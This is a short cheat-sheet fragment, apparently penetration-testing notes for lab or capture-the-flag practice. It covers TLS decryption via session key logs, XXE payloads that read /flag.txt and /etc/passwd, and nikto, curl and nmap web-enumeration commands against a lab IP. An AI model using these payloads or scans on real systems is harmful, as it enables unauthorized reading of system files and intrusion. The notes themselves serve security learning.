Decrypting SSL/TLS traffic from browser (Firefox / Chrome) is possible by using a SSL Session Key, that gets written to the system. (It seemed that Firefox removed this option to create SSLkeylogfile in one of the more recent versions) no
XXE/XML Attack
Malicious DTD Following snippet can be used to get Local File Inclusion or Remote Command Execution on vulnerable XML.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
<br /><?xml version=”1.0”?> <!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///flag.txt”> <!ELEMENT cred (username, password)> <!ELEMENT username (#PCDATA)> <!ELEMENT password (#PCDATA)> ]> <cred> <username>&xxe;</username> <password>dsfdsf</password> </cred> <?xml version=”1.0”?> <!DOCTYPE cred [<!ENTITY xxe SYSTEM “file:///etc/passwd”> <!ELEMENT subnet_mask ANY>]> <details> <subnet_mask>&xxe;</subnet_mask> <test></test> </details> |
Web Enum
Scan site for for general vulnerabilities and applications
|
1 2 |
nikto -h 10.11.1.12 |
Check supported HTTP Methods
|
1 2 |
curl -X OPTIONS http://10.11.1.12 -v |
Check HTTP Vulns with NMAP
|
1 2 3 |
nmap --script http-vuln* -p 80 10.11.1.12 nmap --script=(http* or ssl*) and not (broadcast or dos or external or http-slowloris* or fuzzer) -p 80,443 10.11.1.12 |